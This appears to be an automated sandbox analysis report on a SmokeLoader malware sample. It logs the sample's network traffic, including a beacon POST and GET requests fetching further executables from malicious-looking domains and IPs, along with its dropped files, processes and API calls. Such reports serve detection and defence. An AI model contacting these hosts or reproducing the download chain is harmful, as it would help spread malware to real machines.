            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef ae 8a 70 bc 57 dd 42 d6 f7 23 8c 21 e6 c3 93 50 2c e2 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9KpWB#!P,c0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:57 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeData Raw: 31 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 64 61 74 61 2d 68 6f 73 74 2d 63 6f 69 6e 2d 38 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 11a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at data-host-coin-8.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:55:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOjpYJRg%XQAc}yc0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 28 Dec 2021 12:55:13 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c8 89 40 0e 65 1b e4 bf c1 b1 a2 14 a5 08 cd 2c b4 59 52 db 17 f8 ee 39 ec 3f 52 17 b2 ea 93 42 fe 02 86 1c 80 a7 70 9b 77 a7 f9 0d 0a 30 0d 0a 0d 0a Data Ascii: 3eI:82O@e,YR9?RBpw0
            Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
            Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
            Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
            Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
            Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
            Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
            Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
            Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dbbxvwuoso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: host-data-coin-11.com
            Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: GET /files/5376_1640094939_1074.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
            Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
            Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected SmokeLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, type: MEMORY
            Source: UZ6FEqlix4.exe, 00000000.00000002.674898642.000000000083A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: UZ6FEqlix4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_2_00402A5F
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_2_00402AB3
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_1_00402A5F
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_1_00402B2E
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_2_00402A5F
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_2_00402AB3
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_1_00402A5F
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_1_00402AB3
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: String function: 00426940 appears 133 times
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: String function: 00428320 appears 93 times
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_2_00401A0B NtTerminateProcess,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_2_00402491 NtOpenKey,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_1_00402491 NtOpenKey,
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_2_00401962 Sleep,NtTerminateProcess,
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_2_0040196D Sleep,NtTerminateProcess,
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_2_00401A0B NtTerminateProcess,
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_2_00402084 LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_2_00402491 NtOpenKey,
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_1_00402084 LocalAlloc,NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_1_00402491 NtOpenKey,
            Source: UZ6FEqlix4.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: UZ6FEqlix4.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 411F.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 411F.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: eveggtb.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: eveggtb.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
            Source: C:\Windows\explorer.exeSection loaded: winnsi.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\411F.exe 8BBDDA1786E15A568A573A2F38762E95DE138AF969E0A13B96D7086AAA98BFC2
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\eveggtb 8BBDDA1786E15A568A573A2F38762E95DE138AF969E0A13B96D7086AAA98BFC2
            Source: UZ6FEqlix4.exeVirustotal: Detection: 58%
            Source: UZ6FEqlix4.exeMetadefender: Detection: 20%
            Source: UZ6FEqlix4.exeReversingLabs: Detection: 62%
            Source: UZ6FEqlix4.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe"
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeProcess created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb
            Source: C:\Users\user\AppData\Roaming\eveggtbProcess created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe
            Source: C:\Users\user\AppData\Local\Temp\411F.exeProcess created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeProcess created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe"
            Source: C:\Users\user\AppData\Roaming\eveggtbProcess created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb
            Source: C:\Users\user\AppData\Local\Temp\411F.exeProcess created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\eveggtbJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@9/3@24/5
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_0041C7DF GetTickCount,FreeUserPhysicalPages,GetCalendarInfoW,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,CreateNamedPipeW,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntW,SetFileAttributesA,
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: UZ6FEqlix4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: UZ6FEqlix4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: UZ6FEqlix4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: UZ6FEqlix4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: UZ6FEqlix4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: UZ6FEqlix4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: UZ6FEqlix4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: "C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr
            Source: Binary string: C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_004235C8 push eax; ret
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_008497BF push esi; ret
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_0084975A push esi; ret
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_2_00401880 push esi; iretd
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_2_00402E94 push es; iretd
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_1_00402E94 push es; iretd
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_2_00401880 push esi; iretd
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_2_00402E94 push es; iretd
            Source: C:\Users\user\AppData\Roaming\eveggtbCode function: 11_1_00402E94 push es; iretd
            Source: UZ6FEqlix4.exeStatic PE information: section name: .pejevu
            Source: UZ6FEqlix4.exeStatic PE information: section name: .dozi
            Source: 411F.exe.5.drStatic PE information: section name: .pejevu
            Source: 411F.exe.5.drStatic PE information: section name: .dozi
            Source: eveggtb.5.drStatic PE information: section name: .pejevu
            Source: eveggtb.5.drStatic PE information: section name: .dozi
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_00433420 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
            Source: initial sampleStatic PE information: section name: .text entropy: 6.87583252941
            Source: initial sampleStatic PE information: section name: .text entropy: 6.87583252941
            Source: initial sampleStatic PE information: section name: .text entropy: 6.87583252941
